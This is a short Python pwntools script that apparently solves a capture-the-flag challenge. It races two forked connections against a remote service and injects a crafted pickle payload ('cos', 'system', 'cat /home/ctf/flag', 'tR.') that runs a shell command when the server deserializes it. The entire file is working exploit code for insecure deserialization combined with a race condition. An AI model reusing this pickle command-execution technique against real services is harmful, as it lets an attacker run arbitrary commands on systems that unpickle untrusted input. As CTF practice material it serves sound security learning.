from pwn import *
from os import fork, kill

HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25653

PAYLOAD = "cat /home/ctf/flag"

pid = fork()

if pid != 0:
	while True:
		conn = remote(HOST, PORT)
		conn.sendlineafter(b":", b"didas")
		conn.sendlineafter(b">>>", b"1")
		conn.sendlineafter(b">>>", b"1")
		conn.sendlineafter(b":", b"bomb")
		conn.recvuntil(b":")
		conn.sendline(b"cos")
		conn.sendline(b"system")
		conn.sendline(("(S'"+PAYLOAD+"'").encode('utf-8'))
		conn.sendline(b"tR.")
		conn.sendline(b"\n\n\n")
		conn.close()

else:
	while True:
		conn = remote(HOST, PORT)
		conn.sendlineafter(b":", b"didas")
		conn.sendlineafter(b">>>", b"0")
		conn.sendlineafter(b">>>", b"0")
		conn.sendlineafter(b":", b"bomb")
		res = conn.recvline().decode('utf-8')
		if "[ERROR]" not in res:
			print(res)
			kill(pid, 9)
			break